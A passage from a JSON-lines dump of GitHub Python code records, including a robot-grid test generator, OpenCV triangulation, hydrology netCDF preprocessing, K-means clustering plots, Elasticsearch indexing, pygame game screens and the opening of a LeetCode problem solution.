grid[k%y_length][x]='X'\n\nrobot1=[0,0]\nrobot2=[0,0]\nok = False\nwhile not ok:\n robot1=[random.randrange(y_length),random.randrange(x_length)]\n if grid[robot1[0]][robot1[1]]!='X':\n ok = True\nok = False\n\nwhile not ok:\n robot2=[random.randrange(y_length),random.randrange(x_length)]\n if grid[robot2[0]][robot2[1]]!='X':\n ok = True\n\nprint(str(x_length)+\" \"+str(y_length))\nprint(str(robot1[1])+\" \"+str(robot1[0]))\nprint(str(robot2[1])+\" \"+str(robot2[0]))\nfor row in grid:\n print(\"\".join(row))\n","repo_name":"papajim/artificial_inteligence","sub_path":"Askisi1/testcases/testgenerator.py","file_name":"testgenerator.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1311337823","text":"import numpy as np\nimport cv2\n\nclass Triangulator:\n def __init__(self, mtx):\n \"\"\"\n Constructor for Triangulator class.\n\n Parameters:\n - mtx: intrinsic camera matrix\n \"\"\"\n self.mtx = mtx\n \n def triangulate(self, kp1, kp2, R, t, matches, matchesMask):\n \"\"\"\n Triangulates 3D points from a set of correspondences and camera poses.\n\n Parameters:\n - kp1: keypoints in first image\n - kp2: keypoints in second image\n - R: rotation matrix from second to first camera\n - t: translation vector from second to first camera\n - matches: list of matches between keypoints\n\n Returns:\n - pts_3d: list of 3D points\n \"\"\"\n pts1 = np.float32([kp1[m.queryIdx].pt for m in matches]).reshape(-1, 1, 2)\n pts2 = np.float32([kp2[m.trainIdx].pt for m in matches]).reshape(-1, 1, 2)\n\n pts1 = pts1[np.asarray(matchesMask) == 1, :, :]\n pts2 = pts2[np.asarray(matchesMask) == 1, :, :]\n\n proj_mat1 = np.dot(self.mtx, np.hstack((np.eye(3), np.zeros((3, 1)))))\n proj_mat2 = np.dot(self.mtx, np.hstack((R, t)))\n\n proj_pts1 = cv2.undistortPoints(pts1, self.mtx, None)\n proj_pts2 = cv2.undistortPoints(pts2, self.mtx, None)\n\n proj_pts1 = np.squeeze(proj_pts1).T\n proj_pts2 = np.squeeze(proj_pts2).T\n\n pts_4d_hom = cv2.triangulatePoints(proj_mat1, proj_mat2, proj_pts1, proj_pts2)\n pts_3d_hom = pts_4d_hom / pts_4d_hom[3]\n pts_3d = pts_3d_hom[:3].T\n return pts_3d","repo_name":"MichaelFYang/sfm-3d-vision","sub_path":"triangulator.py","file_name":"triangulator.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14535310395","text":"import importlib.util\n\nfrom ec2mc import consts\n\ndef main(instance, new_ip):\n \"\"\"pass along instance info to handler under config's ip_handlers\"\"\"\n if consts.USE_HANDLER is False:\n return\n if 'IpHandler' not in instance['tags']:\n return\n\n handler_base = instance['tags']['IpHandler']\n handler_path = consts.IP_HANDLER_DIR / handler_base\n if not handler_path.is_file():\n print(f\" {handler_base} not found from config's ip_handlers.\")\n return\n\n handler = _load_script(handler_path)\n if handler is not None:\n handler.main(instance['name'], new_ip)\n\n\ndef _load_script(script_path):\n \"\"\"load python script\"\"\"\n try:\n spec = importlib.util.spec_from_file_location(\"handler\", script_path)\n handler = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(handler)\n return handler\n except ImportError as e:\n handler_base = script_path.name\n print(f\" {e.name} package required by {handler_base} not found.\")\n print(f\" Install with \\\"python -m pip install {e.name}\\\".\")\n return None\n","repo_name":"TakingItCasual/ec2mc","sub_path":"ec2mc/utils/handle_ip.py","file_name":"handle_ip.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23386959927","text":"\"\"\"\n\n Raul Valenzuela\n raul.valenzuela@colorado.edu\n\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tta_analysis3 as tta\nimport pandas as pd\nimport tta_continuity\nfrom matplotlib import rcParams\nfrom rv_utilities import discrete_cmap\n\nrcParams['xtick.labelsize'] = 15\nrcParams['ytick.labelsize'] = 15\nrcParams['axes.labelsize'] = 15\nrcParams['mathtext.default'] = 'sf'\n\n# years = [1998]\nyears = [1998] + range(2001, 2013)\n\ntry:\n wd_layer\nexcept NameError:\n out = tta.preprocess(years=years,layer=[0,500])\n wd_layer = out['wd_layer'][out['WD_rain'].index]\n\nhours_df = pd.DataFrame()\nevents_df = pd.DataFrame()\n\nthres = [140]\nmax_events = 55\nn_event = range(1, max_events)\ncatalog = pd.DataFrame(index=n_event,\n columns=years)\n\nfor th in thres:\n\n hours = np.array([])\n events = np.array([])\n\n for year in range(1998,2013):\n\n if year in [1999, 2000]:\n hours = np.append(hours, [0])\n events = np.append(events, [0])\n else:\n target = wd_layer[str(year)][wd_layer[str(year)] < th]\n time_df = tta_continuity.get_df(target)\n hist = time_df.clasf.value_counts()\n\n catalog[year][hist.index] = hist.values\n\ndcmap = discrete_cmap(7, base_cmap='Set1')\ncls = [dcmap(0),dcmap(1),dcmap(2)]\nscale = 1.3\n\n\n''' histogram '''\n# axes = catalog.fillna(0).hist(bins=np.arange(0.5,22.5),\n# sharex=True,\n# sharey=True,\n# grid=False)\n# axes = axes.flatten()\n# means = list()\n# for ax in axes[:-3]:\n# ax.set_xlim([0, 21.5])\n# ax.set_ylim([0, 35])\n# title = ax.get_title()\n# ax.set_title(title, x=0.8, y=0.75)\n# median = np.percentile(catalog[:][int(title)].dropna(),q=50)\n# mean = np.mean(catalog[:][int(title)].dropna())\n# ax.text(0.95,0.65,'median:{}\\nmean:{:2.1f}'.format(median,mean),\n# ha='right',va='top',\n# transform=ax.transAxes)\n# means.append(mean)\n#\n# for ax in [axes[0], axes[4], axes[8], axes[12]]:\n# ytl = ax.get_yticklabels()\n# for l in ytl[1::2]:\n# l.set_visible(False)\n#\n# axes[12].set_xlabel('n$^{\\circ}$ of hours')\n# axes[4].set_ylabel('n$^{\\circ}$ of events')\n#\n# plt.subplots_adjust(top=0.98, hspace=0.15, wspace=0.1)\n\n''' boxplot '''\ndata = list()\nfor year in years:\n data.append(catalog[:][year].dropna().tolist())\n\nfig,ax = plt.subplots()\n# bp = ax.boxplot(data,whis='range',showmeans=True)\nbp = ax.boxplot(data,\n whis='range',\n sym='',\n showmeans=True,\n showcaps=False,\n whiskerprops={\n 'linestyle': '-',\n 'color': 'k'},\n meanprops={\n 'marker': 'd',\n 'markersize': 0,\n 'markeredgecolor': None,\n 'markerfacecolor': 'r'},\n medianprops={'color': 'r',\n 'linewidth':0},\n boxprops={'color': 'k'}\n )\nlabs = [str(int(np.mod(y,100.))).zfill(2)\n for y in years]\n\n# median = np.mean([p.get_ydata()[0] for p in bp['medians']])\n# mean = np.mean([p.get_ydata()[0] for p in bp['means']])\n\nd=list()\nfor l in data:\n d.extend(l)\nmedian = np.median(d)\nmean = np.mean(d)\n\nax.hlines(y=median, xmin=0, xmax=22, linestyle='--',\n color='r', zorder=10000)\n\nax.hlines(y=mean, xmin=0, xmax=22, linestyle='-',\n color='r', zorder=10000)\n\nyticks = [0] + [np.round(median,1), np.round(mean,1)] + range(5,25,5)\n\nax.set_yticks(yticks)\n\nfor label in ax.get_yticklabels()[1:3]:\n label.set_color('r')\n\nax.set_ylim([0,22])\nax.set_xticklabels(labs)\nax.set_xlabel('winter season [year]')\nax.set_ylabel('TTA duration [hours]')\n\nplace = '/Users/raulvalenzuela/Documents/'\nfname = place+'fig_events_per_season_boxplot.png'\nplt.savefig(fname, dpi=150, format='png',papertype='letter',\n bbox_inches='tight')\n\n\n","repo_name":"rvalenzuelar/tta_climatology","sub_path":"figure_tta_events_per_season_v2.py","file_name":"figure_tta_events_per_season_v2.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25289712512","text":"import sys\nsys.path.append(\"../\")\nfrom numpy import sin, pi, arange\nfrom appJar import gui\n\nx = arange(0.0, 3.0, 0.01)\ny = sin(2*pi*x)\n\napp = gui()\naxes = app.addPlot(\"p1\", x, y)\naxes.legend(['key data'])\napp.go()\n","repo_name":"jarvisteach/appJar","sub_path":"examples/plot2.py","file_name":"plot2.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":615,"dataset":"github-code","pt":"21"} +{"seq_id":"41674483678","text":"\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport pandas as pd\nimport numpy as np\nimport wbgapi as wb\nimport matplotlib.pyplot as mpy\nimport seaborn as sns\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nimport errors\nimport cluster_tools\nfrom sklearn.preprocessing import normalize\n\n\"\"\"## Clustering (K-Means)\"\"\"\n\ncc = ['TUR','BRA','CHN','ISR'] # Selection of country codes\nind1=[\"EN.ATM.CO2E.KT\"] # Indicator for C02 Emission\nind1mn=['C02 Emission']\nind2=[\"EG.ELC.COAL.ZS\"] # indicator for Electricity production from coal source\nind2mn=['Electricity production from coal source']\n\nmy_dataframe1 = wb.data.DataFrame(ind1, cc, mrv=20).T # read data for C02 Emission\nmy_dataframe1=my_dataframe1.fillna(my_dataframe1.mean()) # clean data\nmy_dataframe1.head()\n\nmy_dataframe2 = wb.data.DataFrame(ind2, cc, mrv=50).T # read data for Electricity production from coal source\nmy_dataframe2=my_dataframe2.fillna(my_dataframe2.mean()) # clean data\nmy_dataframe2.head()\n\nclmns=my_dataframe1.columns\nclrs=\"rmby\" # asssign colours\nfor i in range(len(clmns)):\n mpy.figure(figsize=(6,3)) # plot figure size\n mpy.title('C02 Emission by Country for {}'.format(clmns[i])) # plot title\n mpy.plot(my_dataframe1[clmns[i]],\"{}D-\".format(clrs[i]),label=clmns[i]) # line chart\n mpy.xlabel(\"Year\") # x-label of plotting\n mpy.xticks(rotation=90) # x-lable rotation \n mpy.ylabel(\"C02 Emission\") # y-label of plotting\n mpy.legend(loc=\"best\") # place legend\n mpy.grid() # plot griding\n mpy.show() # plot show\n\nfor i in range(len(clmns)):\n mpy.figure(figsize=(8,3)) # plot figure size\n mpy.title('Electricity production from coal source for {}'.format(clmns[i])) # plot title\n mpy.plot(my_dataframe2[clmns[i]],\"{}D-\".format(clrs[i]),label=clmns[i]) # line chart\n mpy.xlabel(\"Year\") # x-label of plotting\n mpy.xticks(rotation=90) # x-lable rotation\n mpy.ylabel(\"Electricity production\") # y-label of plotting\n mpy.legend(loc=\"best\") # place legend\n mpy.grid() # plot griding\n mpy.show() # plot show\n\ndef corrmapviz(dt): # to visualize country correlation with indicators\n cluster_tools.map_corr(dt) # call process\ndfs=[my_dataframe1,my_dataframe2] # accumulatre dataframes\ncorrmapviz(dfs[0]) # visualize correlation\ncorrmapviz(dfs[1]) # visualize correlation\n\ndef nrmdata(df): # method to call normalization process\n nrmouts=cluster_tools.scaler(df) # call process\n return nrmouts[0], nrmouts[1], nrmouts[2]\nscldfs=[]\nmnvls=[]\nmxvls=[]\nfor d in range(len(dfs)):\n outnrm=nrmdata(dfs[d]) # calling method\n scldfs.append(outnrm[0]) # storing scaled(normalized) data\n mnvls.append(outnrm[1]) # storing minimum value\n mxvls.append(outnrm[2]) # storing maximum value\nprint(scldfs[0].head(),\"\\n\")\nprint(scldfs[1].head())\n\ndef optclus(dt): # selection of optimum cluster value\n optclus_ws = []\n val=10\n for i in range(1, val): # K-Means clustering with cluster 1 to 10\n kmeans = KMeans(n_clusters=i, init='k-means++', max_iter=600, random_state=32) # create K-means model\n kmeans.fit(dt) # train k-means model\n optclus_ws.append(kmeans.inertia_) # Storing inertia vaklues for all clusters\n arrws=np.array(optclus_ws)\n arrws=arrws[arrws>1] # Finding the value after which elbow curve smooths\n clopt=arrws[-1] # Finding optimum value of cluster\n optclus=optclus_ws.index(clopt)\n return optclus, optclus_ws, val\n\nclus, allws, clsvl=optclus(scldfs[0]) # \nmpy.figure(figsize=(5,3)) # plot figure size\nmpy.title('Elbow Curve (Optimum Cluster: {})'.format(clus)) # plot title\nmpy.plot(range(1, clsvl), allws,\"c--\") # plot inertia value\nmpy.plot(range(1, clsvl), allws,\"Xm\")\nmpy.xlabel('Number of clusters') # x-label of plotting\nmpy.ylabel('Inertia') # y-label of plotting\nmpy.grid() # plot griding\nmpy.show() # plot show\n\nkmeans = KMeans(n_clusters=clus, init='k-means++', max_iter=300, n_init=10, random_state=0) # final kmeans with optrimum cluster\nkmd = kmeans.fit(scldfs[0]) # train kmeans\nprint(\"Cluster Centres:\",kmd.cluster_centers_)\n\nkmd.cluster_centers_\n\nallcntr=[]\nfor i in kmd.labels_:\n if i==0:\n allcntr.append(clmns[0])\n elif i==1:\n allcntr.append(clmns[1])\n elif i==2:\n allcntr.append(clmns[2])\n elif i==3:\n allcntr.append(clmns[3])\n elif i==4:\n allcntr.append(clmns[4])\n else:\n pass\n\ndf=pd.DataFrame(scldfs[0],columns=my_dataframe1.columns)\nmpy.figure(figsize=(6,3)) # plot figure size\nmpy.title('Cluster Visualization') # plot title\nsns.scatterplot(data=df, x=clmns[0], y=clmns[1], hue=allcntr,palette=\"PuRd\") # scatter plot for clsuter visualization\nmpy.scatter(kmeans.cluster_centers_[:,0], kmeans.cluster_centers_[:,1], marker=\"d\", c=\"b\", s=80, label=\"centroids\")\nmpy.legend() # place legend\nmpy.grid() # plot griding\nmpy.show() # plot show\n\n\"\"\"## Curve Fitting\"\"\"\n\nfrom scipy.optimize import curve_fit\n#!pip install lmfit\nfrom lmfit import Model\n\ndef func(x, amp, cen, wid): # method for curve fitting\n return (amp / (np.sqrt(2*np.pi) * wid)) * np.exp(-(x-cen)**3 / (2*wid**2))\n\nnorml2 = nrmdata(my_dataframe2.values) # normalize data\ny = func(scldfs[1].iloc[:,1], 2.1, 0.7, 1.51) + np.random.normal(0, 0.2, norml2[0].shape[0]) # calling method\ninit_vals = [2, 0, 2] \nbest_vals, covar = curve_fit(func, norml2[0][:,1], y, p0=init_vals,maxfev = 700) # curve fitting\ngmodel = Model(func) # preparing curve fitting\n\nresult = gmodel.fit(y, x=norml2[0][:,1], amp=5, cen=3, wid=0.4) # train model;\nplt.figure(figsize=(6,4)) # plot figure size\nplt.title('Curve Fitting Result') # plot title\nplt.plot(norml2[0][:,1],\"bo\",label=\"Data\")\nplt.plot(result.init_fit, 'm--', label='Initial fit')\nplt.plot(result.best_fit, 'c-', label='Best fit')\nplt.legend() # place legend\nplt.grid() # plot griding\nplt.show() # plot show\n\nresult\n\n","repo_name":"Manasakallem/ADS3","sub_path":"22033469.py","file_name":"22033469.py","file_ext":"py","file_size_in_byte":5967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20656227946","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('auth/', views.auth),\n path('login/', views.login),\n path('projects/', views.IndexView.as_view(), name=\"projects\"),\n path('projects//', views.ProjectView.as_view(), name=\"project\"),\n path('projects//project-tasks//', views.ProjectTaskView.as_view()),\n path('projects//project-tasks//tasks//', views.TaskView.as_view())\n]","repo_name":"turytsia/webapp-todo","sub_path":"server/todo/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15986151316","text":"import csv\nfrom urllib.parse import urlparse\nimport os, sys\nnb_dir = os.path.split(os.getcwd())[0]\nif nb_dir not in sys.path:\n sys.path.append(nb_dir)\nfrom trec_utils import utils\nfrom elasticsearch import Elasticsearch\nfrom elasticsearch import helpers\n\n# Remember that a config.json has to be present in trec_utils\nconfig = utils.load_config()\nurl_info = urlparse(config['ELASTIC'])\n\nes = Elasticsearch([{'host':url_info.hostname,'port':url_info.port}])\n\ndef index_file(file):\n with open(file) as tsvfile:\n reader = csv.reader(tsvfile, delimiter='\\t')\n fake_doc = {\n 'pubmedId': '0',\n 'treatments': {'faketreatment':1},\n 'cuis': {'FAKECUI':1}\n }\n\n doc = fake_doc\n\n actions = []\n \n for row in reader: \n try: \n pubmedId, cui, treatment = row[0], row[1], row[2]\n\n if pubmedId==doc['pubmedId']:\n if treatment in doc['treatments']:\n doc['treatments'][treatment] = doc['treatments'][treatment] + 1\n else:\n doc['treatments'][treatment] = 1\n if cui in doc['cuis']:\n doc['cuis'][cui] = doc['cuis'][cui] + 1\n else:\n doc['cuis'][cui] = 1\n else:\n # Transform dictionaries to list to avoid Elasticsearch issues\n doc_to_save = {\n 'pubmedId': doc['pubmedId'],\n 'treatments': [ [k,str(v)] for k, v in doc['treatments'].items() ],\n 'cuis': [ [k,str(v)] for k, v in doc['cuis'].items() ]\n }\n actions.append({\n \"_id\": doc_to_save['pubmedId'],\n \"_op_type\": \"index\",\n \"_index\": \"treatments\",\n \"_type\": \"treatments\",\n \"_source\": doc_to_save\n })\n doc = {'pubmedId':pubmedId,'treatments':{treatment:1}, 'cuis':{cui:1}}\n except:\n print(\"Exception, line blank?\")\n continue\n \n helpers.bulk(es, actions)\n print(file + \" indexed!\")\n \n# Download and extract this file here\n# http://www.trec-cds.org/medline_treatments.tar.gz\ndef index_all_files():\n i = 0\n for file in os.listdir(nb_dir + \"/treatments_indexing/medline_treatments\"):\n if file.endswith(\".txt\"):\n file = nb_dir + \"/treatments_indexing/medline_treatments/\" + file\n index_file(file)\n i = i + 1\n print(\"Finished! - Files:\", i)\n \nif __name__ == \"__main__\":\n index_all_files()","repo_name":"plopezgarcia/trec-2019-precision-medicine","sub_path":"python-experiments/treatments_indexing/index_treatments.py","file_name":"index_treatments.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"75026857972","text":"import pygame as pg\n\n\ndef writeScore(text, score):\n f = open(\"Score.txt\", 'r+')\n x = text + \":\" + str(score) + \"\\n\"\n lines = f.readlines()\n for i in range(0,len(lines) - 1):\n split = lines[i].split(\":\")\n number = int(split[1])\n print(number)\n if score > number:\n lines.insert(i,x)\n break\n g = open(\"Score.txt\", 'r+')\n for i in range(0, len(lines)):\n g.write(lines[i])\n g.close()\n f.close()\n\n\ndef main(screen, resolution, FPS, clock, score):\n font = pg.font.Font(None, 32)\n\n nome = font.render(\"Digite seu nome:\", True, (255,255,255))\n nomeRect = pg.Rect(0,0,nome.get_width(),nome.get_height())\n nomeRect.center = (resolution[0] / 2, resolution[1] * 0.3)\n input_box = pg.Rect(0, 0, 150, 32)\n input_box.center = (resolution[0] / 2, resolution[1] * 0.4)\n done_button = font.render(\"OK\", True, (255, 255, 255), (0, 200, 0))\n done_buttonRect = pg.Rect(0, 0, done_button.get_width(), done_button.get_height())\n done_buttonRect.center = (input_box.centerx, input_box.centery * 1.2)\n\n color_inactive = pg.Color('lightskyblue3')\n color_active = pg.Color('dodgerblue2')\n color = color_inactive\n active = False\n text = ''\n done = True\n\n while done:\n for event in pg.event.get():\n if event.type == pg.QUIT:\n done = False\n if event.type == pg.MOUSEBUTTONDOWN:\n # If the user clicked on the input_box rect.\n if input_box.collidepoint(event.pos):\n # Toggle the active variable.\n active = not active\n if done_buttonRect.collidepoint(event.pos):\n writeScore(text, score)\n done = False\n else:\n active = True\n # Change the current color of the input box.\n color = color_active if active else color_inactive\n\n if event.type == pg.KEYDOWN:\n if active:\n if event.key == pg.K_RETURN:\n print(text)\n text = ''\n elif event.key == pg.K_BACKSPACE:\n text = text[:-1]\n elif len(text) < 10:\n text += event.unicode\n screen.fill((30, 30, 30))\n # Render the current text.\n txt_surface = font.render(text, True, color)\n # Resize the box if the text is too long.\n width = max(150, txt_surface.get_width()+10)\n input_box.w = width\n # Blit the text.\n screen.blit(txt_surface, (input_box.x+5, input_box.y+5))\n # Blit the input_box rect.\n pg.draw.rect(screen, color, input_box, 2)\n screen.blit(done_button, done_buttonRect)\n screen.blit(nome, nomeRect)\n pg.display.flip()\n clock.tick(FPS)\n","repo_name":"gahenrique/asteroids","sub_path":"scoreScene.py","file_name":"scoreScene.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73539985973","text":"######################################\n# Import and initialize the librarys #\n######################################\nfrom code.api.core import os, log, pygame, PgEss\nfrom code.api.objects import Screen, Frame\nfrom code.api.actions import Runclass, Switchscreen, Info, Alert\nfrom code.api.data.Sound import sound\n\n\n#################\n# Setup logging #\n#################\nfilename = os.path.basename(__file__).split('.')[0]\nlogger = log.get_logger(filename)\n\n\n############################\n# Screen main action class #\n############################\nclass mainmenu:\n\n @staticmethod\n def init():\n # Play game background music\n if not sound.background.isPlaying():\n sound.stopAll(600)\n sound.background.play(loops=-1, withVolume=PgEss.config.sound.background, fadetime=3000)\n \n @staticmethod\n def run():\n # Get action\n event_result = mainmenu_screen.events.get()\n \n # No action\n if event_result == None: return\n # Quit program\n if event_result.contains('outcome', 'quit'): return 'quit'\n\n\n##################\n# Screen objects #\n##################\nmainmenu_screen = Screen (\n name = 'mainmenu',\n main = mainmenu,\n surfaces = {\n 'menu': {\n 'frame': Frame(x=0, y=0, w=1800, h=1080),\n 'new_game': {\n 'type': 'button',\n 'frame': Frame(x=878, y=266, w=652, h=134),\n 'imageData': {'frame': Frame(x=878, y=266, w=652, h=134)},\n 'action': Switchscreen(type='load', screen='new_game')\n },\n 'load_saved': {\n 'type': 'button',\n 'frame': Frame(x=878, y=469, w=652, h=134),\n 'imageData': {'frame': Frame(x=878, y=469, w=652, h=134)},\n 'action': Switchscreen(type='load', screen='saves')\n },\n 'leaderboard': { \n 'type': 'button',\n 'frame': Frame(x=878, y=672, w=652, h=134),\n 'imageData': {'frame': Frame(x=878, y=672, w=652, h=134)},\n 'action': Switchscreen(type='load', screen='leaderboard')\n },\n 'credits': { \n 'type': 'button',\n 'frame': Frame(x=878, y=875, w=652, h=134),\n 'imageData': {'frame': Frame(x=878, y=875, w=652, h=134)},\n 'action': Switchscreen(type='load', screen='credit')\n },\n 'quit': {\n 'type': 'button',\n 'frame': Frame(x=1705, y=986, w=84, h=84),\n 'imageData': {'frame': Frame(x=1690, y=975, w=110, h=105)},\n 'action': Alert (\n type='confirm', \n title='Quit Game',\n content='Are you sure you want to quit?',\n yes=Info(text='quit')\n ),\n },\n }\n }\n)","repo_name":"benwoo1110/Ratventure","sub_path":"python/code/screens/mainmenu.py","file_name":"mainmenu.py","file_ext":"py","file_size_in_byte":2881,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"70154023094","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jan 29 11:13:26 2022\n\n@author: galengorski\n\"\"\"\n\n#import netCDF4\nfrom datetime import datetime\nimport netCDF4\nfrom netCDF4 import Dataset,num2date,date2num\nimport numpy as np\nimport pandas as pd\n#%%\nhydro_data = pd.read_csv('01_fetch/out/hydro_filled_220128.csv', \n usecols = ['site_no','Date','discharge','nitrate','discharge_interp'],\n dtype = {'site_no':str,\n 'discharge': float,\n 'nitrate': float,\n 'discharge_interp':str\n },\n parse_dates = ['Date'],\n index_col = 'Date')\n\n#remove two sites with suspect looking data\nsite_info = pd.read_csv('01_fetch/out/site_list_220507.csv', dtype = {'site_no':str})\nsites = site_info.site_no.unique()\n\nmodel_input_nc = netCDF4.Dataset('02_munge/out/model_input_230526.nc',mode='w')\nmodel_input_nc.title='Modeling input data'\n\nfor i, single_site in enumerate(sites):\n\n hydro_data_temp = hydro_data[hydro_data.site_no == single_site].copy()\n #calculate 7 day moving average\n hydro_data_temp['nitrate_rolling'] = hydro_data_temp['nitrate'].rolling(\"7D\", min_periods = 3, center=False).mean()\n hydro_data_temp['nitrate'] = hydro_data_temp['nitrate_rolling']\n hydro_data_temp['discharge_l10'] = np.log10(hydro_data_temp['discharge']+0.01)\n met_data = pd.read_csv('01_fetch/out/met_data/'+single_site+'_met_data.csv',\n parse_dates = ['date'], index_col = 'date')\n #make sure they have the same length\n len(hydro_data_temp) == len(met_data)\n #join met data with hydro data\n hydro_met = hydro_data_temp.join(met_data, how = 'outer')\n hydro_met['nitrate'] = hydro_met['nitrate'].fillna(-999)\n #hydro_met['nitrate_rolling'] = hydro_met['nitrate_rolling'].fillna(-999)\n #\n \n #read in basin char data\n basin_char = pd.read_csv('01_fetch/out/basin_char/'+single_site+'_basin_char.csv')\n \n #read in groundwater data\n gw_char = pd.read_csv('01_fetch/out/gw_char.csv', dtype= {'site_no':str})\n gw_char_site = gw_char[gw_char['site_no'] == single_site].iloc[:,1:4]\n basin_char_gw = basin_char.append(gw_char_site)\n \n #read in tile drain data\n tiles_char = pd.read_csv('01_fetch/out/tile_drain_char.csv', dtype= {'site_no':str})\n tiles_char_sites = tiles_char[tiles_char['site_no'] == single_site].iloc[:,1:4]\n basin_char_tiles = basin_char_gw.append(tiles_char_sites)\n \n #add in lat and long\n lat_long_df = pd.DataFrame()\n lat_long_df['characteristic_id'] = ['lat','long']\n lat_long_df['characteristic_value'] = list(site_info[site_info.site_no == single_site][['dec_lat_va','dec_long_va']].iloc[0])\n lat_long_df['percent_no_data'] = np.nan\n #merge with basin char\n basin_char_ll = basin_char_tiles.append(lat_long_df)\n \n #read in land cover\n land_cover = pd.read_csv('01_fetch/out/nlcd_data/land_cover_'+single_site+'.csv', \n header = 0, sep = ' ',\n dtype = {'cat':str,\n 'value':float})\n\n \n #clean up column names\n land_cover['characteristic_id'] = 'NLCD_'+land_cover['cat']\n land_cover['characteristic_value'] = land_cover['value']\n land_cover['percent_nodata'] = np.nan\n land_cover = land_cover[['characteristic_id','characteristic_value','percent_nodata']]\n #merge with basin char\n basin_char_lc = basin_char_ll.append(land_cover)\n #\n #fill netcdf\n site = model_input_nc.createGroup(single_site)\n site.site_name = site_info.station_nm[i]\n site.lat_long = [str(site_info.dec_lat_va[i]), str(site_info.dec_long_va[i])]\n site.date_range = [datetime.strftime(hydro_met.index.min(), '%Y-%m-%d'), datetime.strftime(hydro_met.index.max(), '%Y-%m-%d')]\n today = datetime.today()\n site.history = \"Created \" + today.strftime(\"%Y-%m-%d\")\n \n # dimensions.\n time = site.createDimension('time', None)\n basin_char = site.createDimension('basin_char',None)\n \n #create static variables\n \n for j in range(len(basin_char_lc)):\n var_name = basin_char_lc.iloc[j,0]\n #create the variable\n temp_var = site.createVariable(var_name,'f8', 'basin_char')\n #fill the variable\n temp_var[:] = basin_char_lc.iloc[j,1]\n \n #dynamic variables\n date = site.createVariable('Date','f8','time')\n discharge = site.createVariable('Discharge','f8','time')\n discharge_l10 = site.createVariable('Discharge_l10','f8','time')\n nitrate = site.createVariable('Nitrate','f8','time')\n precip = site.createVariable('Precip','f8','time')\n tmax = site.createVariable('TempMax','f8','time')\n tmin = site.createVariable('TempMin','f8','time')\n srad = site.createVariable('SolarRad','f8','time')\n \n \n #fill in dynamic data\n date.units = 'hours since 0001-01-01 00:00:00.0'\n date.calendar = 'gregorian'\n date[:] = date2num(hydro_met.index.to_list(), units=date.units,calendar=date.calendar)\n date.units = 'hours since 0001-01-01 00:00:00.0'\n date.calendar = 'gregorian'\n date.range = [datetime.strftime(hydro_met.index.min(), '%Y-%m-%d'), datetime.strftime(hydro_met.index.max(), '%Y-%m-%d')]\n discharge[:] = hydro_met.discharge\n discharge.units = 'cfs'\n discharge_l10[:] = hydro_met.discharge_l10\n discharge_l10.units = 'none'\n nitrate[:] = hydro_met.nitrate\n nitrate.units = 'mg/L [NO3-NO2]'\n #nitrate_rolling[:] = hydro_met.nitrate_rolling\n #nitrate_rolling.units = 'mg/L [NO3-NO2]'\n precip[:] = hydro_met.prcp\n precip.units = 'mm'\n tmax[:] = hydro_met.tmax\n tmax.units = 'K'\n tmin[:] = hydro_met.tmin\n tmin.units = 'K'\n srad[:] = hydro_met.srad\n srad.units = 'W/m^2'\n \n print(site_info.site_no[i]+' | '+single_site+' | '+site_info.station_nm[i])\n \nmodel_input_nc.close()\n \n","repo_name":"galengorski/no3_ml_proj","sub_path":"02_munge/src/merge_hydro_met_basin_char.py","file_name":"merge_hydro_met_basin_char.py","file_ext":"py","file_size_in_byte":5997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10080215788","text":"# encoding=utf8\n\n'''\n959. Regions Cut By Slashes\nIn a N x N grid composed of 1 x 1 squares, each 1 x 1 square consists of a /, \\, or blank space. These characters divide the square into contiguous regions.\n\n(Note that backslash characters are escaped, so a \\ is represented as \"\\\\\".)\n\nReturn the number of regions.\n\n\n\nExample 1:\n\nInput:\n[\n \" /\",\n \"/ \"\n]\nOutput: 2\nExplanation: The 2x2 grid is as follows:\n\nExample 2:\n\nInput:\n[\n \" /\",\n \" \"\n]\nOutput: 1\nExplanation: The 2x2 grid is as follows:\n\nExample 3:\n\nInput:\n[\n \"\\\\/\",\n \"/\\\\\"\n]\nOutput: 4\nExplanation: (Recall that because \\ characters are escaped, \"\\\\/\" refers to \\/, and \"/\\\\\" refers to /\\.)\nThe 2x2 grid is as follows:\n\nExample 4:\n\nInput:\n[\n \"/\\\\\",\n \"\\\\/\"\n]\nOutput: 5\nExplanation: (Recall that because \\ characters are escaped, \"/\\\\\" refers to /\\, and \"\\\\/\" refers to \\/.)\nThe 2x2 grid is as follows:\n\nExample 5:\n\nInput:\n[\n \"//\",\n \"/ \"\n]\nOutput: 3\nExplanation: The 2x2 grid is as follows:\n\n\n\nNote:\n\n1 <= grid.length == grid[0].length <= 30\ngrid[i][j] is either '/', '\\', or ' '.\n\n\n959. 由斜杠划分区域\n在由 1 x 1 方格组成的 N x N 网格 grid 中,每个 1 x 1 方块由 /、\\ 